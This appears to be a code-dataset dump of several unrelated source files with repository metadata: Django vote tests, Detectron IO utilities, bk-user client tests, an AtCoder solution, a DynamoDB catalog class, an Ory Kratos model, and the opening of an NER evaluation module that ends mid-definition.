def test_double_vote(self):
"""
A double vote updates the original vote to a non-vote
it does not add another vote instance to the database.
"""
vote_types = [1, -1]
for vote_type in vote_types:
for (key, class_name) in self.class_type.items():
response = self.client.post(
self.vote_url,
self.vote_data(key, vote_type)
)
response = self.client.post(
self.vote_url,
self.vote_data(key, vote_type)
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(class_name.objects.count(), 1)
self.assertEqual(
class_name.objects.first().vote_type,
0
)
# there is also a direct unvote option
for key in self.class_type.keys():
response = self.client.post(self.vote_url, self.vote_data(key, 1))
response = self.client.post(self.vote_url, self.vote_data(key, 0))
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(self.class_type[key].objects.count(), 1)
self.assertEqual(self.class_type[key].objects.first().vote_type, 0)
def test_unauthed_vote(self):
"""
An unauthed user can not vote
"""
self.client.logout()
for (key, class_name) in self.class_type.items():
response = self.client.post(self.vote_url, self.vote_data(key, 1))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(class_name.objects.count(), 0)
class VoteKarmaAddition(VoteTestBase):
"""
Post and comment Vote requests and their effect on the posters's
karma
"""
def test_comment_vote(self):
"""
When a comment is voted on the poster's karma should change
appropriately
"""
# make an upvote
original_karma = self.poster.karma
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, 1)
self.assertEqual(self.poster.karma, original_karma + 1)
# upvote again, that cancels original vote
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
# make a downvote
response = self.client.post(self.vote_url, self.comment_vote_data(-1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, -1)
self.assertEqual(self.poster.karma, original_karma - 1)
# from downvote to upvote
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, 1)
self.assertEqual(self.poster.karma, original_karma + 1)
# test an unvote
response = self.client.post(self.vote_url, self.comment_vote_data(0))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(CommentVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
# no change in karma on unauthed vote
self.client.logout()
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(CommentVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
def test_post_vote(self):
"""
When a post is voted on the poster's karma should change
appropriately
"""
# make an upvote
original_karma = self.poster.karma
response = self.client.post(self.vote_url, self.post_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, 1)
self.assertEqual(self.poster.karma, original_karma + 1)
# upvote again, that cancels original vote
response = self.client.post(self.vote_url, self.post_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
# make a downvote
response = self.client.post(self.vote_url, self.post_vote_data(-1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, -1)
self.assertEqual(self.poster.karma, original_karma - 1)
# from downvote to upvote
response = self.client.post(self.vote_url, self.post_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, 1)
self.assertEqual(self.poster.karma, original_karma + 1)
# test an unvote
response = self.client.post(self.vote_url, self.post_vote_data(0))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(PostVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
# no change in karma on unauthed vote
self.client.logout()
response = self.client.post(self.vote_url, self.comment_vote_data(1))
self.poster.refresh_from_db()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertEqual(PostVote.objects.first().vote_type, 0)
self.assertEqual(self.poster.karma, original_karma)
| [
"cdunn6754@gmail.com"
] | cdunn6754@gmail.com |
85550704eeeeb7250fd6c0029ac51c44c29bfa89 | 3d0f61f8bf2ad1ce503022c1c4c9ebe566d6040b | /detectron/utils/io.py | 0cb5e22c3c889728b88623f82840936dc5562504 | [
"MIT",
"Apache-2.0"
] | permissive | programmerjide/Detectron | 3410a812de62fc905860b3afde00f62c68a11c94 | da2441cd3a3d08f9aa1e51b0d05370bdc94bf98e | refs/heads/master | 2020-03-30T18:54:25.149074 | 2019-01-29T08:47:37 | 2019-01-29T08:47:37 | 151,519,747 | 0 | 0 | Apache-2.0 | 2018-10-04T04:45:54 | 2018-10-04T04:45:54 | null | UTF-8 | Python | false | false | 5,864 | py | # Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""IO utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import hashlib
import logging
import os
import re
import six
import sys
from six.moves import cPickle as pickle
from six.moves import urllib
logger = logging.getLogger(__name__)
_DETECTRON_S3_BASE_URL = 'https://s3-us-west-2.amazonaws.com/detectron'
def save_object(obj, file_name, pickle_format=2):
"""Save a Python object by pickling it.
Unless specifically overridden, we want to save it in Pickle format=2 since this
will allow other Python2 executables to load the resulting Pickle. When we want
to completely remove Python2 backward-compatibility, we can bump it up to 3. We
should never use pickle.HIGHEST_PROTOCOL as far as possible if the resulting
file is manifested or used, external to the system.
"""
file_name = os.path.abspath(file_name)
with open(file_name, 'wb') as f:
pickle.dump(obj, f, pickle_format)
def load_object(file_name):
with open(file_name, 'rb') as f:
# The default encoding used while unpickling is 7-bit (ASCII.) However,
# the blobs are arbitrary 8-bit bytes which don't agree. The absolute
# correct way to do this is to use `encoding="bytes"` and then interpret
# the blob names either as ASCII, or better, as unicode utf-8. A
# reasonable fix, however, is to treat it the encoding as 8-bit latin1
# (which agrees with the first 256 characters of Unicode anyway.)
if six.PY2:
return pickle.load(f)
else:
return pickle.load(f, encoding='latin1')
def cache_url(url_or_file, cache_dir):
"""Download the file specified by the URL to the cache_dir and return the
path to the cached file. If the argument is not a URL, simply return it as
is.
"""
is_url = re.match(
r'^(?:http)s?://', url_or_file, re.IGNORECASE
) is not None
if not is_url:
return url_or_file
url = url_or_file
assert url.startswith(_DETECTRON_S3_BASE_URL), \
('Detectron only automatically caches URLs in the Detectron S3 '
'bucket: {}').format(_DETECTRON_S3_BASE_URL)
cache_file_path = url.replace(_DETECTRON_S3_BASE_URL, cache_dir)
if os.path.exists(cache_file_path):
assert_cache_file_is_ok(url, cache_file_path)
return cache_file_path
cache_file_dir = os.path.dirname(cache_file_path)
if not os.path.exists(cache_file_dir):
os.makedirs(cache_file_dir)
logger.info('Downloading remote file {} to {}'.format(url, cache_file_path))
download_url(url, cache_file_path)
assert_cache_file_is_ok(url, cache_file_path)
return cache_file_path
def assert_cache_file_is_ok(url, file_path):
"""Check that cache file has the correct hash."""
# File is already in the cache, verify that the md5sum matches and
# return local path
cache_file_md5sum = _get_file_md5sum(file_path)
ref_md5sum = _get_reference_md5sum(url)
assert cache_file_md5sum == ref_md5sum, \
('Target URL {} appears to be downloaded to the local cache file '
'{}, but the md5 hash of the local file does not match the '
'reference (actual: {} vs. expected: {}). You may wish to delete '
'the cached file and try again to trigger automatic '
'download.').format(url, file_path, cache_file_md5sum, ref_md5sum)
def _progress_bar(count, total):
"""Report download progress.
Credit:
https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console/27871113
"""
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write(
' [{}] {}% of {:.1f}MB file \r'.
format(bar, percents, total / 1024 / 1024)
)
sys.stdout.flush()
if count >= total:
sys.stdout.write('\n')
def download_url(
url, dst_file_path, chunk_size=8192, progress_hook=_progress_bar
):
"""Download url and write it to dst_file_path.
Credit:
https://stackoverflow.com/questions/2028517/python-urllib2-progress-hook
"""
response = urllib.request.urlopen(url)
total_size = response.info().getheader('Content-Length').strip()
total_size = int(total_size)
bytes_so_far = 0
with open(dst_file_path, 'wb') as f:
while 1:
chunk = response.read(chunk_size)
bytes_so_far += len(chunk)
if not chunk:
break
if progress_hook:
progress_hook(bytes_so_far, total_size)
f.write(chunk)
return bytes_so_far
def _get_file_md5sum(file_name):
"""Compute the md5 hash of a file."""
hash_obj = hashlib.md5()
with open(file_name, 'r') as f:
hash_obj.update(f.read())
return hash_obj.hexdigest()
def _get_reference_md5sum(url):
"""By convention the md5 hash for url is stored in url + '.md5sum'."""
url_md5sum = url + '.md5sum'
md5sum = urllib.request.urlopen(url_md5sum).read().strip()
return md5sum
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
65e9bfc51a6d4ab7499c2b0d6f71f5725e351419 | 8fe440deb4eb66d2fcb222a7c43680dc516394c1 | /src/api/bkuser_core/tests/categories/plugins/custom/test_client.py | 4c5bf6bce48cd7f37c39efcb6734fed68794bd8c | [
"MIT"
] | permissive | robert871126/bk-user | 780e163db76a8a997ed94a1a83389fa4f81ad6a4 | 8c633e0a3821beb839ed120c4514c5733e675862 | refs/heads/master | 2023-08-20T11:05:46.317044 | 2021-10-22T08:44:06 | 2021-10-22T08:44:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,217 | py | # -*- coding: utf-8 -*-
"""
TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-用户管理(Bk-User) available.
Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
from unittest.mock import patch
import pytest
from bkuser_core.categories.plugins.custom.client import CustomDataClient
from bkuser_core.categories.plugins.custom.exceptions import CustomAPIRequestFailed
from bkuser_core.categories.plugins.custom.models import CustomTypeList
from requests import Request, Response
pytestmark = pytest.mark.django_db
class TestClient:
@staticmethod
def make_resp(content: list, status_code: int = 200) -> Response:
response = Response()
response._content = str.encode(json.dumps({"count": len(content), "results": content})) # type: ignore
response.status_code = status_code
fake_req = Request(method="GET", json={}, url="")
fake_req.body = None # type: ignore
response.request = fake_req # type: ignore
return response
@pytest.fixture
def client(self, test_custom_category):
c = CustomDataClient(
api_host="test.com",
category_id=test_custom_category.id,
paths={"profile": "some-path", "department": "some-path"},
)
return c
@pytest.mark.parametrize(
"fake_profiles,expected",
[
(
[
{
"username": "fake-user",
"email": "fake@test.com",
"code": "code-1",
"display_name": "fakeman",
"telephone": "13111123445",
"leaders": [],
"departments": [],
"extras": {"aaa": "xxxx", "bbb": "qqqq", "uniquetest": "vvvv"},
"position": 0,
},
{
"username": "fake-user-2",
"email": "fake2@test.com",
"code": "code-2",
"display_name": "fakeman2",
"telephone": "13111123445",
"leaders": ["code-1"],
"departments": [],
"extras": {"aaa": "xxxx", "bbb": "qqqq", "uniquetest": "vvvv"},
"position": 0,
},
],
{"code-1", "code-2"},
),
],
)
def test_fetch_profiles(self, client, fake_profiles, expected):
with patch("requests.get") as mocked_get:
mocked_get.return_value = self.make_resp(fake_profiles)
r = client.fetch_profiles()
assert isinstance(r, CustomTypeList)
assert len(r.values) == len(fake_profiles)
assert set(r.items_map.keys()) == expected
@pytest.mark.parametrize(
"fake_profiles,expected",
[
(
[
{
"username": "fake-user",
"email": "fake@test.com",
"code": "code-1",
"extras": {"aaa": "xxxx", "bbb": "qqqq", "uniquetest": "vvvv"},
"position": 0,
}
],
TypeError,
),
],
)
def test_fetch_wrong_profiles(self, client, fake_profiles, expected):
with patch("requests.get") as mocked_get:
mocked_get.return_value = self.make_resp(fake_profiles)
with pytest.raises(expected):
client.fetch_profiles()
@pytest.mark.parametrize(
"fake_departments,expected",
[
(
[
{"name": "测试部门", "code": "dep1", "parent": None},
{"name": "测试部门2", "code": "dep2", "parent": "dep1"},
],
{"dep1", "dep2"},
),
],
)
def test_fetch_departments(self, client, fake_departments, expected):
with patch("requests.get") as mocked_get:
mocked_get.return_value = self.make_resp(fake_departments)
r = client.fetch_departments()
assert isinstance(r, CustomTypeList)
assert len(r.values) == len(fake_departments)
assert set(r.items_map.keys()) == expected
def test_fetch_exception(self, client):
with patch("requests.get") as mocked_get:
mocked_get.return_value = self.make_resp([], 400)
with pytest.raises(CustomAPIRequestFailed):
client.fetch_departments()
| [
"bluesedenyu@gmail.com"
] | bluesedenyu@gmail.com |
50a1c197aa182e2136aec1c04b8b9ee483b8ca09 | f9a8ee37334771f37edda863db08a7dcccc9522f | /AtCoder/Practice/茶緑埋め/ARC016B.py | 751d89f85482bc23091e3ca78e6dbd24952fce1a | [] | no_license | shimmee/competitive-programming | 25b008ee225858b7b208c3f3ca7681e33f6c0190 | 894f0b7d557d6997789af3fcf91fe65a33619080 | refs/heads/master | 2023-06-07T13:07:17.850769 | 2021-07-05T17:20:47 | 2021-07-05T17:20:47 | 331,076,780 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,205 | py | # ARC016B - 音楽ゲーム
# URL: https://atcoder.jp/contests/arc016/tasks/arc016_2
# Date: 2021/02/18
# ---------- Ideas ----------
# 90度回転させてgroupbyする
# key=='x'であれば連続する長さをインクリメント
# key == 'o'であれば+1インクリメント
# ------------------- Answer --------------------
#code:python
from itertools import groupby
def rotated(array_2d):
list_of_tuples = zip(*array_2d[::-1])
return [list(elem) for elem in list_of_tuples]
n = int(input())
a = [input() for _ in range(n)]
a = rotated(a)
ans = 0
for l in a:
gr = groupby(l)
for key, group in gr:
if key == 'x':
ans += len(list(group))
elif key == 'o':
ans += 1
print(ans)
# ACしたけど解説が違う解き方してた!
# 列数と同じ長さの配列を用意して,直前(上)がoだったらTrueにして,カウントしない
n = int(input())
X = [input() for _ in range(n)]
flag = [False]*9
ans = 0
for i in range(n):
for j in range(9):
s = X[i][j]
if s == 'o':
if not flag[j]:
ans += 1
flag[j] = True
else:
flag[j] = False
if s == 'x': ans += 1
print(ans)
# もっと簡単にかける。直前(上)がoかどうかを毎回調べればいい
n = int(input())
S = ['.'*9] + [input() for _ in range(n)]
ans = 0
for y in range(1, n+1):
for x in range(9):
if S[y][x] == 'x':
ans += 1
elif S[y][x] == 'o' and S[y-1][x] != 'o':
ans += 1
print(ans)
# ------------------ Sample Input -------------------
6
..o..x.o.
..o..x.o.
..x..o.o.
..o..o.o.
..o..x.o.
..o..x.o.
15
.........
.x.......
.........
...x.....
.........
.......o.
.......o.
.......o.
.........
..x.....o
........o
........o
....x...o
.x......o
........o
# ----------------- Length of time ------------------
# 7分
# -------------- Editorial / my impression -------------
# https://www.slideshare.net/chokudai/atcoder-regular-contest-016
# 解説にある方法2つとも試してみた。
# 結局普通に全探索するのが一番早い
# ----------------- Category ------------------
#AtCoder
#全探索
#ARC-B | [
"shinmeikeita@gmail.com"
] | shinmeikeita@gmail.com |
87cbbb361b99a7e07ef4e3ae17d6ca347ce8425f | 5e277a32c166ae45bea28310074dc459a0d99cf6 | /.metadata/.plugins/org.eclipse.core.resources/.history/ba/50143292859b00161299af2c090fd9cc | 9158d155646d3e761ac70b1bf19b0f6db5aa03ea | [] | no_license | vgvcode/pos | 4d7172d7905f60157fcae445c650475d17a9a390 | a9dba2c5c3fc8c4529c6619a3dc92c9608a4c70d | refs/heads/master | 2021-01-13T13:12:37.833510 | 2016-11-02T22:28:42 | 2016-11-02T22:28:42 | 72,686,364 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,974 | #!/usr/bin/python
from __future__ import print_function # Python 2/3 compatibility
import json
from decimal import *
import time
import uuid
import boto3
from copy import deepcopy
from boto3.dynamodb.conditions import Key
import commonmodule
# Helper class to convert a DynamoDB item to JSON.
class DecimalEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, Decimal):
if o % 1 > 0:
return float(o)
else:
return int(o)
return super(DecimalEncoder, self).default(o)
class CatalogSchema:
'base class for DDL operations on catalog'
tableName = 'catalog'
def __init(self, endpoint = "http://localhost:8000"):
self.__endpoint = endpoint
self.__dynamodb = boto3.resource('dynamodb', endpoint_url=endpoint)
def createTable(self):
'create a new catalog'
result = True
try:
self.__table = self.__dynamodb.create_table(
TableName=CatalogSchema.tableName,
KeySchema=[
{
'AttributeName': 'CatalogID',
'KeyType': 'HASH' #Partition key
},
{
'AttributeName': 'ItemID',
'KeyType': 'RANGE' #Sort key
}
],
AttributeDefinitions=[
{
'AttributeName': 'CatalogID',
'AttributeType': 'S'
},
{
'AttributeName': 'ItemID',
'AttributeType': 'S'
},
],
ProvisionedThroughput={
'ReadCapacityUnits': 10,
'WriteCapacityUnits': 10
}
)
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def deleteTable(self):
result = True
try:
self.__table.delete()
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
class Catalog:
'common base class for catalog'
tableName = 'catalog'
def __init__(self, catalogId, endpoint = "http://localhost:8000"):
self.__endpoint = endpoint
self.__dynamodb = boto3.resource('dynamodb', endpoint_url=endpoint)
self.__table = self.__dynamodb.Table(Catalog.tableName)
self.__catalogId = catalogId
self.__items = {}
self.fetchFromDB()
def get(self):
return {
"catalogId" : self.__catalogId,
"endpoint" : self.__endpoint,
"tableName" : Catalog.tableName,
"items" : self.__items
}
def load(self, fileName):
result = True
try:
'load the catalog from a json file'
with open(fileName) as json_file:
catalog = json.load(json_file, parse_float = Decimal)
for catItem in catalog:
CatalogID = catItem['CatalogID']
ItemID = catItem['ItemID']
Info = catItem['Info']
print("Adding item:", CatalogID, ItemID, Info)
self.__table.put_item(
Item={
'CatalogID': CatalogID,
'ItemID': ItemID,
'Info': Info
}
)
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def fetchFromDB(self):
'fetch the catalog'
'first clear the existing catalog'
result = True
self.__items = {}
try:
response = self.__table.query(KeyConditionExpression=Key('CatalogID').eq(self.__catalogId))
for r in response['Items']:
self.__items[r['ItemID']] = r['Info']
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def addItem(self, idy, name, price):
'add item to the catalog'
result = True
print('Adding to DB: {}, {}, {}'.format(idy, name, price))
createdTicks = time.time()
createdTime = time.asctime(time.localtime(createdTicks))
info = {
'ItemId': idy,
'CreatedTime': createdTime,
'CreatedTicks': Decimal(createdTicks),
'UpdatedTime': "0",
'UpdatedTicks': Decimal(0),
'Name': name,
'Price': commonmodule.money(price)
}
try:
response = self.__table.put_item(
Item={
'CatalogID': self.__catalogId,
'ItemID': idy,
'Info': info
}
)
'add the item to the catalog in memory'
self.__items[idy] = info
#print("PutItem succeeded:")
#print(json.dumps(response, indent=4, cls=DecimalEncoder))
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def getItems(self):
return self.__items
def updatePrice(self, itemId, price):
'update item price'
result = True
updatedTicks = time.time()
updatedTime = time.asctime(time.localtime(updatedTicks))
try:
response = self.__table.update_item(
Key={
'CatalogID': self.__catalogId,
'ItemID': itemId,
},
UpdateExpression="set Info.Price = :p, Info.UpdatedTime = :u, Info.UpdatedTicks = :t",
ExpressionAttributeValues={
':p': commonmodule.money(price),
':u': updatedTime,
':t': Decimal(updatedTicks),
},
ReturnValues="UPDATED_NEW"
)
print("Item updated")
result = True
#print("UpdateItem succeeded:")
#print(json.dumps(response, indent=4, cls=DecimalEncoder))
'update the item in the catalog in memory'
self.__items[itemId]['Price'] = commonmodule.money(price)
self.__items[itemId]['UpdatedTime'] = updatedTime
self.__items[itemId]['UpdatedTicks'] = updatedTicks
except Exception as e:
print(e.response['Error']['Message'])
result = False
finally:
return result
def removeItem(self, itemId):
'remove item from catalog'
result = False
try:
response = self.__table.delete_item(
Key={
'CatalogID': self.__catalogId,
'ItemID': itemId,
},
)
'remove the item from the catalog in memory'
del self.__items[itemId]
#print("DeleteItem succeeded:")
#print(json.dumps(response, indent=4, cls=DecimalEncoder))
except Exception as e:
print(e.response['Error']['Message'])
finally:
return result
def print(self):
for itm in self.__items:
print('{}: {}'.format(itm, self.__items[itm]))
print('There are {} items in the catalog'.format(len(self.__items)))
| [
"vgvcode@gmail.com"
] | vgvcode@gmail.com | |
7481ab62600b37b564fb2f0ca4915e76760a84d7 | 4234dc363d0599e93abc1d9a401540ad67702b3b | /clients/kratos/python/ory_kratos_client/model/ui_node_text_attributes.py | 5f6f84ba22c9664700ca785fb6b7853756a8cdfd | [
"Apache-2.0"
] | permissive | ninjayoto/sdk | 8065d3f9e68d287fc57cc2ae6571434eaf013157 | 73823009a416905a4ca1f9543f1a94dd21e4e8da | refs/heads/master | 2023-08-28T03:58:26.962617 | 2021-11-01T17:57:24 | 2021-11-01T17:57:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,102 | py | """
Ory Kratos API
Documentation for all public and administrative Ory Kratos APIs. Public and administrative APIs are exposed on different ports. Public APIs can face the public internet without any protection while administrative APIs should never be exposed without prior authorization. To protect the administative API port you should use something like Nginx, Ory Oathkeeper, or any other technology capable of authorizing incoming requests. # noqa: E501
The version of the OpenAPI document: v0.8.0-alpha.2
Contact: hi@ory.sh
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from ory_kratos_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from ory_kratos_client.exceptions import ApiAttributeError
def lazy_import():
from ory_kratos_client.model.ui_text import UiText
globals()['UiText'] = UiText
class UiNodeTextAttributes(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
"""
lazy_import()
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
lazy_import()
return {
'id': (str,), # noqa: E501
'node_type': (str,), # noqa: E501
'text': (UiText,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'id': 'id', # noqa: E501
'node_type': 'node_type', # noqa: E501
'text': 'text', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, id, node_type, text, *args, **kwargs): # noqa: E501
"""UiNodeTextAttributes - a model defined in OpenAPI
Args:
id (str): A unique identifier
node_type (str):
text (UiText):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.id = id
self.node_type = node_type
self.text = text
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, id, node_type, text, *args, **kwargs): # noqa: E501
"""UiNodeTextAttributes - a model defined in OpenAPI
Args:
id (str): A unique identifier
node_type (str):
text (UiText):
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
self.id = id
self.node_type = node_type
self.text = text
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| [
"3372410+aeneasr@users.noreply.github.com"
] | 3372410+aeneasr@users.noreply.github.com |
ead246f8b3bc4b82a6e3c6fcbc15adda7e8c9394 | 2148b047f6b0e8c3182aae438d745cf35234220c | /config/eval.py | 6b77931a633704949ff5f9f810166b62f52199b4 | [] | no_license | xzk-seu/xzk_thesis_code | d12845fdbed38893ac66aec876ed8933c5a7a2a1 | abfebca5315725d28346ddc362abe1fef73097b9 | refs/heads/master | 2023-04-11T19:36:16.556585 | 2021-05-07T12:18:18 | 2021-05-07T12:18:18 | 363,370,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,078 | py | from typing import List
from common import Instance
import torch
import numpy as np
class Span:
"""
A class of `Span` where we use it during evaluation.
We construct spans for the convenience of evaluation.
"""
def __init__(self, left: int, right: int, type: str):
"""
A span compose of left, right (inclusive) and its entity label.
:param left:
:param right: inclusive.
:param type:
"""
self.left = left
self.right = right
self.type = type
def __eq__(self, other):
return self.left == other.left and self.right == other.right and self.type == other.type
def __hash__(self):
return hash((self.left, self.right, self.type))
def evaluate_batch_insts(batch_insts: List[Instance],
batch_pred_ids: torch.LongTensor,
batch_gold_ids: torch.LongTensor,
word_seq_lens: torch.LongTensor,
idx2label: List[str],
